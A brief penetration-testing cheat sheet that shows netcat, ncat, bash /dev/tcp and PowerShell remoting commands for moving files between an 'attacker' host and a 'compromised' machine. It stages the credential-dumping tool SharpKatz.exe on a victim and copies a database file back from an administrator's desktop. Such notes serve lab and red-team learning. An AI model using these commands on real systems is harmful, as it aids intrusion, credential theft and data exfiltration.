Misc

File Transfer with Netcat and Ncat

1. Netcat - Attack Host - Sending File to Compromised machine. The option -q 0 gonna close connection after transferring.

# Using original netcat
victim$ nc -l -p 8000 > SharpKatz.exe

attacker$ nc -q 0 13.13.13.13 8000 < SharpKatz.exe

1. Ncat - Attack Host - Sending File to Compromised machine

# Using Ncat
victim$ ncat -l -p 8000 --recv-only > SharpKatz.exe

attacker$ ncat --send-only 13.13.13.13 8000 < SharpKatz.exe

1. Sending File as Input to Netcat

attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe

victim$ nc 13.13.13.13 443 > SharpKatz.exe

1. Sending File as Input to Ncat

attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe

victim$ ncat 13.13.13.13 443 --recv-only > SharpKatz.exe

1. Sending File from Attacker machine to Compromised using /dev/tcp

# Netcat option
attacker$ sudo nc -l -p 443 -q 0 < SharpKatz.exe

# Ncat option
attacker$ sudo ncat -l -p 443 --send-only < SharpKatz.exe

# Connecting to netcat using /dev/tcp
victim$ 
cat < /dev/tcp/13.13.13.13/443 > SharpKatz.exe

PowerShell Session File Transfer

I know I used to show about PowerShell file transfers in Windows File Transfer section, but there are possibilities when no HTTP, HTTPS or SMB are available. So here we'll use PowerShell Remoting aka WinRM. Usually work on TCP/5985 port for HTTP and TCP/5986 port for HTTPS.

1. Check TCP 5985 Port on DATABASE01

PS C:\carnifex17> Test-NetConnection -ComputerName DATABASE01 -Port 5985

1. Create a PowerShell Remoting Session to DATABASE01

PS C:\Desktop> $Session = New-PSSession -ComputerName DATABASE01

1. Copy samplefile.txt from our Localhost to the DATABASE01 Session

PS C:\Desktop> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\

1. Copy DATABASE.txt from DATABASE01 Session to our Localhost

PS C:\Desktop> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session